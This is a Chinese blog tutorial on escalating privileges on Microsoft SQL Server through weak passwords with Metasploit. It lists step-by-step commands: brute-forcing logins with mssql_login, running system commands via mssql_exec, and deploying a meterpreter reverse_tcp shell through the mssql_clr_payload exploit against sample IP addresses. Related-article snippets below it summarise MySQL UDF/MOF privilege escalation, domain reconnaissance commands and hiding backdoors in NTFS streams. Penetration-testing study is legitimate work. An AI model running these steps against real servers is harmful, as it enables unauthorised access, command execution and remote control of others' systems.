Mssql弱命令提权

最新推荐文章于 2024-11-08 18:30:00 发布
最新推荐文章于 2024-11-08 18:30:00 发布
阅读量410 收藏 10
点赞数 3
文章标签: sqlserver 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Palpitate_LL/article/details/140298287
版权

Mssql弱命令提权

1、进入msf

msfconsole

进入msf

2、搜索爆破模块

search mssql_login

搜索爆破模块

3、使用爆破模块,并查看参数

use 0 或 use
auxiliary/scanner/mssql/mssql_login

show options

使用模块并查看参数

4、设置参数,并执行

设置参数

5、搜索执行命令模块

search mssql_exec

搜索执行命令模块

6、使用模块并查看参数

use 0 或 use
auxiliary/admin/mssql/mssql_exec

show options

使用模块并查看参数

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
1.网络安全多个方向学习路线
2.全网最全的CTF入门学习资料
3.一线大佬实战经验分享笔记
4.网安大厂面试题合集
5.红蓝对抗实战技术秘籍
6.网络安全基础入门、Linux、web安全、渗透测试方面视频

7、设置参数,并执行

set rhosts 192.168.80.181

set password 1234567

set cmd cmd.exe /c "whoami"

设置参数并执行

8、搜索模块

search mssql_clr

搜索模块

9、使用模块并查看参数

use 0 或 use
exploit/windows/mssql/mssql_clr_payload

show options

使用模块并查看参数

10、设置参数,并执行

set rhosts 192.168.10.181

set password 1234567

set payload windows/x64/meterpreter/reverse_tcp

run

设置参数并执行

11、执行相关命令

相关命令

Palpitate_LL
关注
域渗透常用命令
神隐哥的博客
03-02 1595
信息搜集 net view /domain:XXX 查看XXX域中的机器列表 net view /domain 查看内网中有多少个域 setspn -T jumbolab.com -Q */* 快速寻找内网中注册的服务 net user /domain 查看域用户 net group "domain admins" /domain 查看域管 net time /domain 定位域控。也可以通过ipconfig /all。一般DNS就是域控 nltest /domain_trusts 列出域信任关系 c
mysql 5.0 提权_MYSQL提权总结
weixin_30016593的博客
01-19 326
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxne...
【安全学习】记一次内网环境渗透
kali_Ma的博客
11-21 2491
通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2325
MSF多层内网渗透全过程
msf中mssql扫描以及漏洞利用模块
weixin_33725270的博客
10-24 1392
auxiliary/admin/mssql/mssql_enum       normal     Microsoft SQL Server Configuration Enumeratorauxiliary/admin/mssql/mssql_enum_domain_accounts     normal     Microsoft SQL Server SUSER_SNAME Windows ...
渗透杂记-2013-07-13 windows/mssql/mssql_payload
weixin_30421809的博客
12-28 171
扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:36 Scanning 203.171.239.* [4 ports] Completed Pi...
mysql提权不执行命令_mysql无法通过webshell执行命令提权某windows服务器
weixin_30724041的博客
01-31 430
mysql无法通过webshell执行命令提权某windows服务器simeon在某些渗透场景中,拿到shell却也因为无法执行命令而苦恼,因为无法执行命令意味做提权就没戏了。在本案例中就遇到拿到shell后无法执行命令,通过前期的一些基础研究发现,其实可以通过udf提权来绕过。下面是整个渗透过程:1.获取数据库root密码获取该网站的主站密码是通过下载网站cms压缩包获取,如图1所示,从压缩包中...
MySQL 漏洞利用与提权
weixin_50464560的博客
07-15 2588
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQL 的 UDF 提权、MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
mysql 提权_MYSQL提权总结
weixin_42515024的博客
01-18 532
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL WindowsRemote System Level Exploit (Stuxnet...
mysql提权_mysql提权总结
weixin_39996478的博客
01-18 150
一、mof提权windows管理规范提供了以下三种方法编译到WMI存储库的托管对象格式(MOF)文件:1、运行MOF文件指定为命令行参数讲Mofcomp.exe文件。2、使用IMofCompiler接口和$CompileFile方法。3、拖放到%SystemRoot%\System32\Wbem\MOF文件夹的MOF文件。Micrsoft建议您到存储库编译MOF文件使用前两种方法。也就是运行Mof...
MySQL提权总结(建议收藏)
xj28555的博客
09-08 765
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
Mysql数据库的UDF提权
CoffeMilk的博客
11-05 1342
渗透人员编写可调用系统命令行(CMD或shell)的文件生成动态链接库(Windows系统是.dll;Linux系统是.so),且将该动态链接库内容上传到MySql的函数插件文件夹目录下;然后在通过sql语句调用该动态链接库创建一个自定义函数,最后直接调用该自定义函数sql执行查询系统命令,实现提权(即:在数据库中的查询就等价于直接在系统调用cmd或者shell中执行命令
Windows与Linux的MYSQL UDF提权分析
m0_57221101的博客
04-03 872
原理分析 什么是UDF 所谓UDF 就是user define function的简称,就是用户自定义函数,用户可以添加函数到mysql中实现功能的扩充,调用方法和一般函数一样类似于database(),但这一功能也导致了自定义函数中可能包含了恶意函数(系统命令),然后恶意的指令被以更高的权限执行后,实现提权的手段。 一般无论是库站分离的服务器,还是库站在一台服务器的情况,我们都是先拿下www的权限之后才有机会接触到数据库连接,毕竟没有多少人会真的打开3306端口把数据库对公,因此我们获得一个数据库
护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限
weixin_39582656的博客
02-12 413
一个dede的站shell,看了下 disable_functionsexec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件...
mysql ntfs 提权 (errcode: 22)_NTFS ADS带来的WEB安全问题
weixin_35837856的博客
02-17 345
如今的文件上传漏洞突破日益困难,各种花式绕过方式也被防御的死死的,但想必NTFS ADS这种在实战中用到的还是相对较少,尤其是它所附带的后门隐藏效果,对于我们在日常渗透中也会有很大助益,这里分享一篇关于此的文章。注:文中图片均可点击放大查看!看不清楚直接点击查看即可!可以看到ADS在很久以前就被一些安全人员所关注,并且也提出了一些经典的利用,比如隐藏文件,隐藏webshell(http://blo...
Redis - 事务
最新发布
ketil27的博客
11-08 509
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
windows11安装redis
qq_42985657的博客
11-06 391
下载免安装版本,鼠标点击一下自动下载。解压。
【达梦数据库】Oracle数据库通过DTS工具迁移数据到达梦数据库--索引数量存在出入
weixin_47686079的博客
11-06 100
【代码】【达梦数据库】Oracle数据库通过DTS迁移到达梦数据库索引数量不一致。
情怀系列国际版棋牌完整源码具备强大的多语言扩展功能,涵盖了900多款子游戏,专为全球市场的游戏开发和运营设计。
z926098的博客
11-05 406
客户端使用Cocos Creator进行跨平台开发,可以发布为App、H5网页和PC网页。这种跨平台的能力使运营商只需维护一套代码,就能同时管理多个终端。除此之外,系统还支持产品的热更新功能,大幅提升运营效率并降低成本,实现了产品层面的“降维打击”。情怀棋牌源代码的服务器端使用JAVA和Node.js开发,采用RocketMQ作为消息队列中间件,有效防止服务器堵塞、消峰。该源码包涵盖了完整的服务器端代码、服务端900款子游戏源码、客户端代码、客户端700款子游戏、管理后台代码、数据库以及热更新生成脚本等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值